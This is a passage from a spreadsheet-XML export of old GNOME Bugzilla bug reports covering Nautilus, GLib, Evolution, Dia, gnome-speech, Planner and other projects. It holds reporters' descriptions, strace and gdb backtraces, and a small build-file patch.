    <t>NAUTILUS-525269</t>
  </si>
  <si>
    <t>Nautilus asks for confirmation twice when unmounting a volume and emptying its trash</t>
  </si>
  <si>
    <t>Please describe the problem:
When nautilus informs a user that a mounted volume's trash is not empty on unmounting the user should only have to tell nautilus to empty the trash once.
Occurs on Fedora 9 Beta as well as Ubuntu 8.04 beta so is a gvfs issue I suppose
Steps to reproduce:
1. Insert a usb stick
2. Create a file on it
3. Move the file to the trash
4. Empty the trash
5. Tell nautilus to empty the trash when it asks
Actual results:
Nautilus empties the trash
Expected results:
Nautilus asks again whether you'd like to empty the trash after you've already told it you do
Does this happen every time?
Yes
Other information:
Screenshots will be attached</t>
  </si>
  <si>
    <t>NAUTILUS-87899</t>
  </si>
  <si>
    <t>Nautilus crashes on startup and when launched by command line</t>
  </si>
  <si>
    <t xml:space="preserve">Package: nautilus
Severity: major
Version: 2.0.0
Synopsis: Nautilus crashes on startup and when launched by command line
Bugzilla-Product: nautilus
Bugzilla-Component: general
BugBuddy-GnomeVersion: 2.0 (2.0.1)
Description:
Description of Problem:
Nautilus crashes with an application error on startup or from command
line
Steps to reproduce the problem:
1. Login to Gnome desktop
2. Launch nautilus from command line
Actual Results:
Nautilus crashes with an application error on startup or from command
line
Expected Results:
How often does this happen?
Every time
Additional Information:
final lines of strace output:
open(/usr/lib/libstdc++.so.4 O_RDONLY) = 17
read(17 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\0\240\3...
1024) = 1024
fstat64(17 {st_mode=S_IFREG|0755 st_size=787160 ...}) = 0
mmap2(NULL 806144 PROT_READ|PROT_EXEC MAP_PRIVATE 17 0) =
0x40e15000
mprotect(0x40ebf000 109824 PROT_NONE) = 0
mmap2(0x40ebf000 90112 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED
17 0xaa) = 0x40ebf000
mmap2(0x40ed5000 19712 PROT_READ|PROT_WRITE
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS -1 0) = 0x40ed500
0
close(17)                               = 0
open(/lib/libgcc_s.so.1 O_RDONLY)    = 17
read(17 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\23\0\000...
1024) = 1024
fstat64(17 {st_mode=S_IFREG|0755 st_size=33576 ...}) = 0
mmap2(NULL 32464 PROT_READ|PROT_EXEC MAP_PRIVATE 17 0) =
0x40eda000
mprotect(0x40ee1000 3792 PROT_NONE)   = 0
mmap2(0x40ee1000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 17
0x7) = 0x40ee1000
close(17)                               = 0
munmap(0x40df8000 84864)               = 0
setresuid32(0xffffffff 0x1f4 0xffffffff) = 0
setregid32(0xffffffff 0x1f4)           = 0
setresuid32(0xffffffff 0x1f4 0xffffffff) = 0
setregid32(0xffffffff 0x1f4)           = 0
stat64(/home/mark/.nautilus {st_mode=S_IFDIR|0755 st_size=4096
...}) = 0
lstat64(/home/mark/.gnome-desktop/ {st_mode=S_IFDIR|0755
st_size=4096 ...}) = 0
lstat64(/home/mark/.gnome-desktop/ {st_mode=S_IFDIR|0755
st_size=4096 ...}) = 0
access(/home/mark/.nautilus F_OK)    = 0
access(/home/mark/.nautilus/first-time-flag F_OK) = 0
open(/tmp/orbit-mark/bonobo-activation-register.lock O_RDWR|O_CREAT
0700) = 17
fcntl64(17 F_SETFD FD_CLOEXEC)        = 0
getpid()                                = 630
fcntl64(17 F_SETLKW {type=F_WRLCK whence=SEEK_SET start=0 len=1}) =
0
open(/tmp/orbit-mark/reg.IDL:Bonobo_ObjectDirectory:1.0-local
O_RDONLY) = -1 ENOENT (No such file o
r directory)
open(/tmp/orbit-mark/reg.IDL:Bonobo_ObjectDirectory:1.0 O_RDONLY) =
-1 ENOENT (No such file or dire
ctory)
writev(16 [{GIOP\1\2\1\0\\\0\0\0 12}
{\200\362\377\277\1\0\0\0\0\0\0\0\30\0\0\0\0\0\0\0P\332...
 92}] 2) = 104
poll([{fd=6 events=POLLIN} {fd=12 events=POLLIN|POLLPRI} {fd=13
events=POLLIN|POLLPRI} {fd=14 events=POLLIN|POLLPRI} {fd=16
events=POLLIN|POLLPRI revents=POLLIN}] 5 -1) = 1
read(16 GIOP\1\2\1\1L\1\0\0 12)     = 12
read(16 \200\362\377\277\0\0\0\0\1\0\0\0\1\0\0\0\f\0\0\0\1\1\1...
332) = 332
getpid()                                = 630
fcntl64(17 F_SETLKW {type=F_UNLCK whence=SEEK_SET start=0 len=1}) =
0
close(17)                               = 0
writev(16 [{GIOP\1\2\1\0\234\1\0\0 12}
{`\364\377\277\1\0\0\0\0\0L:\30\0\0\0\0\0\0\0P\332\314\34
0... 412}] 2) = 424
poll([{fd=6 events=POLLIN} {fd=12 events=POLLIN|POLLPRI} {fd=13
events=POLLIN|POLLPRI} {fd=14 e
vents=POLLIN|POLLPRI} {fd=16 events=POLLIN|POLLPRI revents=POLLIN}]
5 -1) = 1
read(16 GIOP\1\2\1\1\0\0\0 12)     = 12
read(16 `\364\377\277\0\0\0\0\1\0\0\0\1\0\0\0\f\0\0\0\1\1\1\1\1...
44) = 44
writev(16 [{GIOP\1\2\1\0\364\0\0\0 12}
{p\364\377\277\1\0\0\0\0\0L:\30\0\0\0\0\0\0\0P\332\314\34
0... 244}] 2) = 256
poll( 
Debugging Information:
Backtrace was generated from '/usr/bin/nautilus'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o debugging symbols found)...
(no debugging symbols found)...[New Thread 1024 (LWP 499)]
[New Thread 2049 (LWP 500)]
[New Thread 1026 (LWP 501)]
[New Thread 2051 (LWP 502)]
[New Thread 3076 (LWP 503)]
0x40cb3b39 in wait4 () from /lib/i686/libc.so.6
#0  0x40cb3b39 in wait4 () from /lib/i686/libc.so.6
#1  0x40d30340 in sys_sigabbrev () from /lib/i686/libc.so.6
#2  0x408e09d3 in waitpid () from /lib/i686/libpthread.so.0
#3  0x4023ca85 in gnome_scores_display_with_pixmap ()
   from /usr/lib/libgnomeui-2.so.0
#4  0x408de3fb in pthread_sighandler () from /lib/i686/libpthread.so.0
#5  0x40c3e348 in sigaction () from /lib/i686/libc.so.6
#6  0x40c3f969 in abort () from /lib/i686/libc.so.6
#7  0x40ac9786 in g_logv () from /usr/lib/libglib-2.0.so.0
#8  0x40ac97c4 in g_log () from /usr/lib/libglib-2.0.so.0
#9  0x40061b89 in nautilus_bookmark_set_name ()
   from /usr/lib/libnautilus-private.so.2
#10 0x40062963 in nautilus_bookmark_menu_item_new ()
   from /usr/lib/libnautilus-private.so.2
#11 0x40a78f51 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#12 0x40a64bf0 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#13 0x40a78b01 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#14 0x40a77ade in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#15 0x40a77d44 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#16 0x400860e4 in nautilus_file_emit_changed ()
   from /usr/lib/libnautilus-private.so.2
#17 0x4006faba in nautilus_directory_emit_change_signals ()
   from /usr/lib/libnautilus-private.so.2
#18 0x4007456c in nautilus_directory_number_outstanding ()
   from /usr/lib/libnautilus-private.so.2
#19 0x40ab4626 in g_hash_table_foreach () from
/usr/lib/libglib-2.0.so.0
#20 0x40070076 in nautilus_directory_notify_files_removed ()
   from /usr/lib/libnautilus-private.so.2
#21 0x40077c3d in nautilus_file_changes_consume_changes ()
   from /usr/lib/libnautilus-private.so.2
#22 0x400ba340 in nautilus_monitor_cancel ()
   from /usr/lib/libnautilus-private.so.2
#23 0x40ac2793 in g_idle_remove_by_data () from
/usr/lib/libglib-2.0.so.0
#24 0x40ac2a65 in g_idle_remove_by_data () from
/usr/lib/libglib-2.0.so.0
#25 0x40ac32cd in g_idle_remove_by_data () from
/usr/lib/libglib-2.0.so.0
#26 0x40abf1af in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#27 0x4049376f in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#28 0x0806981a in gtk_widget_grab_focus ()
#29 0x40c2d082 in __libc_start_main () from /lib/i686/libc.so.6
Thread 5 (Thread 3076 (LWP 503)):
#0  0x40c3e469 in sigsuspend () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x408dd0b8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x408d9f3b in pthread_cond_wait () from /lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4078fb1f in gnome_vfs_ssl_to_socket () from
/usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#4  0x408db880 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
Thread 4 (Thread 2051 (LWP 502)):
#0  0x40c3e469 in sigsuspend () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x408dd0b8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x408d9f3b in pthread_cond_wait () from /lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4078fb1f in gnome_vfs_ssl_to_socket () from
/usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#4  0x408db880 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
Thread 3 (Thread 1026 (LWP 501)):
#0  0x40c3e469 in sigsuspend () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x408dd0b8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x408d9f3b in pthread_cond_wait () from /lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4078fb1f in gnome_vfs_ssl_to_socket () from
/usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#4  0x408db880 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
Thread 2 (Thread 2049 (LWP 500)):
#0  0x40cdabbb in poll () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x408dadd8 in __pthread_manager () from /lib/i686/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 1024 (LWP 499)):
#0  0x40cb3b39 in wait4 () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x40d30340 in sys_sigabbrev () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x408e09d3 in waitpid () from /lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4023ca85 in gnome_scores_display_with_pixmap ()
   from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#4  0x408de3fb in pthread_sighandler () from /lib/i686/libpthread.so.0
No symbol table info available.
#5  0x40c3e348 in sigaction () from /lib/i686/libc.so.6
No symbol table info available.
#6  0x40c3f969 in abort () from /lib/i686/libc.so.6
No symbol table info available.
#7  0x40ac9786 in g_logv () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#8  0x40ac97c4 in g_log () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#9  0x40061b89 in nautilus_bookmark_set_name ()
   from /usr/lib/libnautilus-private.so.2
No symbol table info available.
#10 0x40062963 in nautilus_bookmark_menu_item_new ()
   from /usr/lib/libnautilus-private.so.2
No symbol table info available.
#11 0x40a78f51 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#12 0x40a64bf0 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#13 0x40a78b01 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#14 0x40a77ade in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0x40a77d44 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#16 0x400860e4 in nautilus_file_emit_changed ()
   from /usr/lib/libnautilus-private.so.2
No symbol table info available.
#17 0x4006faba in nautilus_directory_emit_change_signals ()
   from /usr/lib/libnautilus-private.so.2
No symbol table info available.
#18 0x4007456c in nautilus_directory_number_outstanding ()
   from /usr/lib/libnautilus-private.so.2
No symbol table info available.
#19 0x40ab4626 in g_hash_table_foreach () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#20 0x40070076 in nautilus_directory_notify_files_removed ()
   from /usr/lib/libnautilus-private.so.2
No symbol table info available.
#21 0x40077c3d in nautilus_file_changes_consume_changes ()
   from /usr/lib/libnautilus-private.so.2
No symbol table info available.
#22 0x400ba340 in nautilus_monitor_cancel ()
   from /usr/lib/libnautilus-private.so.2
No symbol table info available.
#23 0x40ac2793 in g_idle_remove_by_data () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#24 0x40ac2a65 in g_idle_remove_by_data () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#25 0x40ac32cd in g_idle_remove_by_data () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#26 0x40abf1af in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#27 0x4049376f in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#28 0x0806981a in gtk_widget_grab_focus ()
No symbol table info available.
#29 0x40c2d082 in __libc_start_main () from /lib/i686/libc.so.6
No symbol table info available.
#0  0x40cb3b39 in wait4 () from /lib/i686/libc.so.6
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-07-11 01:50 -------
Reassigning to the default owner of the component nautilus-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>rip6</t>
  </si>
  <si>
    <t>GNOME-CORE-3954</t>
  </si>
  <si>
    <t>Crash when opening URLs (gnome-terminal Crash at 131.111.202.55)</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-core
Version: 1.0.53
Severity: 
&gt;Synopsis: Crash when opening URLs
&gt;Class: sw-bug
System: Cyrix 6x86 P133+ 48MB RAM Linux 2.2.13 libc 2.1.2
&gt;Description:
Gnome-Terminal segfaults when I open a URL in Netscape by right clicking on it and selecting from the context menu or ctrl-left clicking on it. Netscape still continues to load.
&gt;How-To-Repeat:
See description. This happens every time that I select a URL.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 15:16 -------
This bug was previously known as bug 3954 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=3954
Originally filed under the gnome-core product and gnome-terminal component.
Unknown version 1.0.x in product gnome-core. Setting version to the default unspecified.
The original reporter (pjc51@hermes.cam.ac.uk) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-core-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>pjc51</t>
  </si>
  <si>
    <t>ADWAITA-ICON-THEME-651865</t>
  </si>
  <si>
    <t>gnome-icon-theme conflicts with libreoffice</t>
  </si>
  <si>
    <t>With the recent libreoffice release 3.4 they are now shipping a icon named calc.png (instead of the previous openoffice left-over ooo-calc.png) which goes to /usr/share/icons/hicolor/{dimension}/apps/calc.png. However this conflicts with gnome-icon-theme which comes with a /usr/share/icons/gnome/{dimension}/apps/calc.png which is in fact a symlink to accessories-calculator.png. Therefore gnome-shell shows libreoffice-calc with a gnome-calculator icon. 
I suggest to remove the calc.png symlink from the gnome-icon-theme. 
I'm reporting this from a archlinux install with gnome-icon-theme-3.0.0-1 and libreoffice-3.4.0-1 this is a follow up on https://bugs.archlinux.org/task/24570.</t>
  </si>
  <si>
    <t>flx.bier</t>
  </si>
  <si>
    <t>GLIB-166386</t>
  </si>
  <si>
    <t>incorrect recursive code for g_file_get_contents for win32</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Use the function in win32.
Stack trace:
To hell with this bug guide!  Here is the offending code from gfileutils.c as
shown by viewcvs for version 1.56.2.1:
789 : 	matthiasc 	1.49 	#ifdef G_OS_WIN32
790 : 	  	  	
791 : 	  	  	#undef g_file_get_contents
792 : 	  	  	
793 : 	  	  	/* Binary compatibility version. Not for newly compiled code. */
794 : 	  	  	
795 : 	  	  	gboolean
796 : 	  	  	g_file_get_contents (const gchar *filename
797 : 	  	  	gchar **contents
798 : 	  	  	gsize *length
799 : 	  	  	GError **error)
800 : 	  	  	{
801 : 	  	  	gchar *utf8_filename = g_locale_to_utf8 (filename -1 NULL NULL
error)
802 : 	  	  	gboolean retval
803 : 	  	  	
804 : 	  	  	if (utf8_filename == NULL)
805 : 	  	  	return FALSE
806 : 	  	  	
807 : 	  	  	retval = g_file_get_contents (utf8_filename contents length error)
808 : 	  	  	
809 : 	  	  	g_free (utf8_filename)
810 : 	  	  	
811 : 	  	  	return retval
812 : 	  	  	}
813 : 	  	  	
814 : 	  	  	#endif
815 : 	
Other information:
Note a couple of things:  (1) although this is supposed not to be used for new
code there is no compilation control except #ifdef G_OS_WIN32 (2) the code
contains an infinite recursion because it incorrectly calls g_file_get_contents
instead of g_file_get_contents_utf8.  This problem causes GIMP for Windows to
fail to start discovered by Michael Schumacher.</t>
  </si>
  <si>
    <t>GNOME-USER-DOCS-398902</t>
  </si>
  <si>
    <t>Split up Configuring Your Desktop chapter</t>
  </si>
  <si>
    <t>I think it is a good idea to split up the above named chapter because it is ugly and difficult to browse in its current state.
Now that gnome-control-center has some categories I figured we could use those.
Matt</t>
  </si>
  <si>
    <t>VALA-519933</t>
  </si>
  <si>
    <t>Code Generator</t>
  </si>
  <si>
    <t>Can't use vector element assignment with pointers in delegate</t>
  </si>
  <si>
    <t>Please describe the problem:
Valac complains when assigning to a vector passed as a pointer. See example below.
using GLib
class Foo : Object {
  public static delegate void AFunc (double *x int y)
  public AFunc a_func
}
class Bar : Foo {
  construct {
    a_func = (x y) =&gt; {
      x[0] = 3
      stdout.printf(%d\n x[0])
    }
  }
}
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>EVOLUTION-214486</t>
  </si>
  <si>
    <t>Mailbox is always crashing</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Major
Version: 0.16.100
Synopsis: Mailbox is always crashing
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Hello i downloaded over the last 2 weeks ervery evolution snapshot +
all requiered files through redcarpet. but by all last versions the
inbox crashes and no summary-screen will be shown. 
Unknown reporter: tischer_silvio@web.de changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>tischer_silvio</t>
  </si>
  <si>
    <t>GTK+-54331</t>
  </si>
  <si>
    <t>incomplete documentation for gtk_drawing_area_new ()</t>
  </si>
  <si>
    <t>The documentation for gtk_drawing_area_new () says nothing about the
returned value.
See
http://developer.gnome.org/doc/API/2.0/gtk/gtkdrawingarea.html#GTK-DRAWING-AREA-NEW
I assume that the documentattion for this function should say
	Returns: a new GtkDrawingArea
and 'GtkDrawingArea' should be a hyperlink to the GtkDrawingArea widget
documentation.</t>
  </si>
  <si>
    <t>BEAGLE-481726</t>
  </si>
  <si>
    <t>Substandard .desktop file (patch against latest SVN attached)</t>
  </si>
  <si>
    <t>desktop-file-utils found the following problems :
beagle/search/beagle-search.desktop.in.in :
Encoding=UTF-8 : Encoding is deprecrated
Categories=GNOMEGTKApplicationCoreUtilityFilesystem : Application is deprecated</t>
  </si>
  <si>
    <t>SYSTEM-MONITOR-146846</t>
  </si>
  <si>
    <t>system-monitor - inaccurate CPU usage information</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian testing/unstable
Package: system-monitor
Severity: major
Version: GNOME2.6.1 2.4.x
Gnome-Distributor: Debian
Synopsis: Inaccurate CPU usage information
Bugzilla-Product: system-monitor
Bugzilla-Component: general
Bugzilla-Version: 2.4.x
Description:
Description of Problem:
Gnome system monitor shows much inaccurate CPU load information. For
example when your system is heavy loaded (for example running bochs) it
shows only 15 % CPU load taken by it'self (gnome-system-monitor) and 0 %
by bochs process.
Steps to reproduce the problem:
1. Run some cpu intensive program
2.  Check CPU load with Gnome System Monitor
3.  Compare the output for example with old well known top command
Actual Results:
15 % CPU load by gnome-system-monitor it'self
Expected Results:
100 % CPU load by bochs
How often does this happen?
always
Additional Information:
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-07-09 07:41 -------
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product system-monitor.
   Setting to default milestone for this product '---'
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>warownyr</t>
  </si>
  <si>
    <t>DIA-112377</t>
  </si>
  <si>
    <t>UML exported to LaTeX issue</t>
  </si>
  <si>
    <t>When exporting UML into LaTeX documents there is a 'bug' when exporting a
protected class.
The UML symbol for protected is the # symbol and this is also a reserved
symbol in LaTeX. The only workaround I found is to find any '#' in the .tex
file and put a backslash before it so that latex treats it as a normal
character. (ie: '#' is replaced by '\#')</t>
  </si>
  <si>
    <t>clementxvii</t>
  </si>
  <si>
    <t>CONDUIT-523551</t>
  </si>
  <si>
    <t>.conduit on removeable devices just contain the last finished sync</t>
  </si>
  <si>
    <t>The .coduit file which is created on removeable devices just contains the last finished sync. But It should contain all sources which can be used for sync.</t>
  </si>
  <si>
    <t>GNOME-LIBS-52048</t>
  </si>
  <si>
    <t>Double DESTDIR for scoredir installation</t>
  </si>
  <si>
    <t>When installing with a non-empty DESTDIR it is prefixed two times to
scoredir. Apply the patch below and regenerate Makefile.in to solve this
report (it probably has bad wrappings but it is trivial to apply by hand)
This bug has been present at least from version 1.2.4 to 1.2.12.
diff -C 2 -r -N /tmp/gnome-libs-1.2.12/gnome-data/Makefile.am
gnome-libs-1.2.12/gnome-data/Makefile.am
*** /tmp/gnome-libs-1.2.12/gnome-data/Makefile.am       Tue May  4 19:00:14
1999
--- gnome-libs-1.2.12/gnome-data/Makefile.am    Mon Mar 12 22:22:12 2001
***************
*** 1923 ****
        gnome-make-postscript-mimes
! scoredir=$(DESTDIR)$(localstatedir)/games
  sysconf_DATA=paper.config mime-magic
--- 1923 ----
        gnome-make-postscript-mimes
! scoredir=$(localstatedir)/games
  sysconf_DATA=paper.config mime-magic
***************
*** 3033 ****
  install-data-local:
        $(mkinstalldirs) $(DESTDIR)$(scoredir)
!       -chgrp $(GAMES_GROUP) $(scoredir) &amp;&amp; chmod g=rwXs
$(DESTDIR)$(scoredir)
        $(top_builddir)/libgnome/gnome-gen-mimedb
$(DESTDIR)$(sysconfdir)/mime-magic
--- 3033 ----
  install-data-local:
        $(mkinstalldirs) $(DESTDIR)$(scoredir)
!       -chgrp $(GAMES_GROUP) $(DESTDIR)$(scoredir) &amp;&amp; chmod g=rwXs
$(DESTDIR)$(scoredir)
        $(top_builddir)/libgnome/gnome-gen-mimedb
$(DESTDIR)$(sysconfdir)/mime-magic</t>
  </si>
  <si>
    <t>frodol</t>
  </si>
  <si>
    <t>GNOME-SPEECH-121354</t>
  </si>
  <si>
    <t>freetts gets mute</t>
  </si>
  <si>
    <t>Overview Description:
---------------------
Using gnome-2.4 from 20 August 2003 gnome-speech 0.2.7 from CVS head 
I have discovered that the only one voice of freets gets mute after a while. 
Steps to Reproduce: 
-------------------
- get gnome-speech from CVS
- build compile and install gnome-speech
- launch test-speech 
- select the FreeTTS server
- select the Speech Interrupt test
Actual Results:
---------------
At interrupt test there are some warnings and after the test is over
nothing gets spoken anymore.
 test-speech
1: OAFIID:GNOME_Speech_SynthesisDriver_Festival:proto0.2
2: OAFIID:GNOME_Speech_SynthesisDriver_FreeTTS:proto0.2
3: OAFIID:GNOME_Speech_SynthesisDriver_Viavoice:proto0.2
Select a server: 2
Atempting to activate OAFIID:GNOME_Speech_SynthesisDriver_FreeTTS:proto0.2.
Driver name: FreeTTS Gnome Speech Driver
Driver version: 0.2
Synthesizer name: FreeTTS
Synthesizer Version: 1.1.2
** (process:1086): WARNING **: Ignoring incoming code_sets component
1. default
Select voice: 1
Please select a test.
1. Parameter test.
2. Callback test.
3. Speech Interrupt test.
4. Wait test.
0. Exit.
Select test: 3
Speech started.
1
Speech ended.
(process:1086): Bonobo-CRITICAL **: file bonobo-main.c: line 311
(bonobo_main_quit): assertion `bonobo_main_loops != NULL' failed
Speech started.
3
Speech ended.
(process:1086): Bonobo-CRITICAL **: file bonobo-main.c: line 311
(bonobo_main_quit): assertion `bonobo_main_loops != NULL' failed
Speech started.
5
....
Expected Results:
----------------
No warnings to be displayed and the voice to speak after this Interrupt test.
Additional Information: 
----------------------
1. Running test-speech for the second time 3rd etc with freetts server
generates almost the same behavior but the engine is mute from the
beginning. Running the Interrupt test when the voice is mute does not
generate the above warnings.
Note that no hanging occurs EXCEPT the callback test (when the freetts
driver is mute the callback test makes test-speech hang).
Freetts remains mute until a bonobo-slay command is executed (killing the
server with killall -9 freetts-synthesis-driver  is not helping).
2.The same scenario of Interrupt test is in gnopernicus  so the same bad
behavior is happening in the AT-client.</t>
  </si>
  <si>
    <t>ad</t>
  </si>
  <si>
    <t>BANSHEE-384292</t>
  </si>
  <si>
    <t>track list steals focus when source is selected</t>
  </si>
  <si>
    <t>When a source is selected from the source list the focus changes automatically to the track list. This isn't very keyboard navigation friendly as it makes switching source without a mouse very difficult - e.g. changing to the source three below the current requires you to get focus on the source list press down press tab several times to get the focus back on the sourcelist press down again etc.
I'm not sure whether the current behaviour is by-design but if the track list didn't steal focus you could simply press down several times in a row.</t>
  </si>
  <si>
    <t>DIA-462563</t>
  </si>
  <si>
    <t>shapes</t>
  </si>
  <si>
    <t>Labels on FS ortho polyline flow lines do not honor alignment</t>
  </si>
  <si>
    <t>FS sheet supports two types of flow lines: simple and ortho-polyline.
The labels on the simple flow lines honor the text alignment setting.
The labels on the ortho-poyline flow lines do not.  They are always centered.</t>
  </si>
  <si>
    <t>mirko.vukovic</t>
  </si>
  <si>
    <t>EVINCE-166915</t>
  </si>
  <si>
    <t>File-&gt;Print should be File-&gt;Print...</t>
  </si>
  <si>
    <t>File-&gt;Print calls up the libgnomeprint dialog so the menu item should have an
ellipsis appended.</t>
  </si>
  <si>
    <t>GNOME-CALCULATOR-125782</t>
  </si>
  <si>
    <t>Display confusing if user just enters a (.</t>
  </si>
  <si>
    <t>If the user enters a left parentheses ( without
there being an outstanding operator the display
shows:
0(
which is confusing because it could be taken that
the result of the bracketed calculation will be multiplied 
bu zero).</t>
  </si>
  <si>
    <t>TOTEM-300461</t>
  </si>
  <si>
    <t>Use buttons instead of checkboxes</t>
  </si>
  <si>
    <t>The playlist of Totem uses checkboxes to allow the user to play it in a random
order and to loop around it. Would improve Totem's usability if they were
ToggleButton's instead with a the image (for example the one used in Jamboree).
These buttons should be located on the same control as the 'Add' and 'Remove'</t>
  </si>
  <si>
    <t>cogumbreiro</t>
  </si>
  <si>
    <t>GSTREAMER-321213</t>
  </si>
  <si>
    <t>packages</t>
  </si>
  <si>
    <t>gstreamer-ffmpeg 0.8.7 hasn't been built for the fedora 4 repo</t>
  </si>
  <si>
    <t>There's no packages for the 0.8.7 version of gstreamer-ffmpeg in the fedora core
4 repo supplied by gstreamer.freedesktop.org</t>
  </si>
  <si>
    <t>PYGTK-66128</t>
  </si>
  <si>
    <t>SelectionData __members__ reports wrong number of attributes</t>
  </si>
  <si>
    <t>typo in PyGtkSelectionData_GetAttr reports the wrong number of attributes
for the __members__ attribute. Missing 's' in format of Py_BuildValue</t>
  </si>
  <si>
    <t>PANGO-512473</t>
  </si>
  <si>
    <t>[patch] gtk-doc warnings</t>
  </si>
  <si>
    <t>When compiling the docs gtk-doc gives a few warnings. The attached patch fixes those (without changing any semantics). Please set the patch status to commit now and I'll commit.
Patch is against current SVN trunk.</t>
  </si>
  <si>
    <t>GOSSIP-423465</t>
  </si>
  <si>
    <t>Subscription pending notification is not anchored to status icon</t>
  </si>
  <si>
    <t>It always shows up in the bottom right (default) position. Trivial fix apparently.</t>
  </si>
  <si>
    <t>EVOLUTION-216197</t>
  </si>
  <si>
    <t>'By Popular Acclaim' tracker bug</t>
  </si>
  <si>
    <t>Basically this bug is for features we're adding or thinking of adding
because users are requesting it a lot.</t>
  </si>
  <si>
    <t>PLANNER-372694</t>
  </si>
  <si>
    <t>crash in Project Management: Trying to load a planner...</t>
  </si>
  <si>
    <t>Version: 0.14.1
What were you doing when the application crashed?
Trying to load a planner XML file from a previous version.
Distribution: Ubuntu 6.10 (edgy)
Gnome Release: 2.16.1 2006-10-02 (Ubuntu)
BugBuddy Version: 2.16.0
Memory status: size: 72429568 vsize: 0 resident: 72429568 share: 0 rss: 18960384 rss_rlim: 0
CPU usage: start_time: 1163023284 rtime: 0 utime: 252 stime: 0 cutime:238 cstime: 0 timeout: 14 it_real_value: 0 frequency: 0
Backtrace was generated from '/usr/bin/planner'
(no debugging symbols found)
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1225713472 (LWP 9524)]
(no debugging symbols found)
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb78c934b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
#2  0xb7f3c1b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
#3  
#4  0xb7f87f20 in mrp_task_manager_calculate_task_work ()
   from /usr/lib/libplanner-1.so.0
#5  0xb7f88f00 in mrp_task_manager_recalc () from /usr/lib/libplanner-1.so.0
#6  0xb7f894b2 in mrp_task_manager_set_block_scheduling ()
   from /usr/lib/libplanner-1.so.0
#7  0xb7f832cd in mrp_project_load () from /usr/lib/libplanner-1.so.0
#8  0x080885ba in planner_window_open ()
#9  0x080887b6 in planner_window_open_in_existing_or_new ()
#10 0x08089fee in planner_window_new ()
#11 0xb7911b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#12 0xb790479b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
